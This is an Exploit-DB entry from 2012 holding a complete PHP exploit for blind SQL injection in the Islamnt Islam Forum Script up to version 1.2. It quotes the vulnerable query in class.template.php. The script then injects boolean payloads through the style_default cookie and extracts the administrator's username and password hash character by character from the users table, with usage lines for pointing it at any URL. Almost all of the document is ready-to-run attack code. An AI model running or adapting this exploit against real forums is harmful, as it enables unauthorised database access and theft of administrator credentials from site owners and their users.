Islamnt Islam Forum Script 1.2 - Blind SQL Injection

EDB-ID:

20260

CVE:



Author:

s3n4t00r

Type:

webapps


Platform:

PHP

Date:

2012-08-05


<?php
/*
  ---------------------------------------------------------------
  Islamnt <=  Remote Blind SQL Injection Exploit by s3n4t00r
  ---------------------------------------------------------------

  Author...............: s3n4t00r
  Home.................: Sec-w.com
  software link........: http://www.islamnt.net/download.php
  affected versions....: from 1 to 1.2
  Gr34ts 4.............: Exp-Bl00d


  [-] Vulnerable code in class/class.template.php:

	public function get_template ($val)
	{
		 $q = new ib_query();
	   	global $style_default;
		 $style_def = ib_setting('style_site');
		 $sel_temp = $q->Query("select $val from styles where id_style='$style_default'"); <-- #   here
		 $row_temp = $q->FetchO($sel_temp);
		 $this->temp = $row_temp->$val;
		 $this->temp = stripslashes($this->temp);

	}

*/


print "\n+------------------------------------------------------------+";
print "\n| Islamnt <=  Remote Blind SQL Injection Exploit by s3n4t00r |";

print "\n+------------------------------------------------------------+\n";


if (!extension_loaded('curl')) die("cURL extension required\n");
error_reporting(E_ERROR);
set_time_limit(0);


function get($url,$inj)
{

			$curl =	curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
			curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3);
			curl_setopt($curl,CURLOPT_URL,$url);
            curl_setopt($curl, CURLOPT_COOKIE, "style_default=1$inj");
            curl_setopt($curl, CURLOPT_HEADER, 1);
            curl_setopt($curl, CURLOPT_VERBOSE, 0);
			$calis = curl_exec($curl);
			@curl_close($calis);
            return $calis;


}

function chek_get($connect)
{



         if(eregi("<option value=''></option>",$connect))
          {
            return true;
          }
          else
          {
            return false;
          }

}


if ($argc < 2)
{
            print "\nUsage......: php $argv[0] <url>\n";
            print "\nExample....: php $argv[0] http://localhost/mytickets/";
            print "\nExample....: php $argv[0] http://localhost/mytickets/\n";
            die();
}

$sql_f = chek_get(get($argv[1],"' and 1='2 /*"));
$sql_t = chek_get(get($argv[1],"' and 1='1 /*"));



if($sql_t == $sql_f)
{

          print "\n\t sorry: magic_quotes_gpc = On ): \n";
          die();
}



print "\n\t[+] Getting Admin Username and Password\n\n\t";



for ($g = 1; $g <= 40; $g++) {  //eidt
for ($i = 46; $i <= 122; $i++) {

       $inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,user_user,pass_user)+frOm+users+liMit 0,1),".$g.",1))='".$i."/*"));

       if($inject == $sql_t){print  chr($i);}
}
}




?>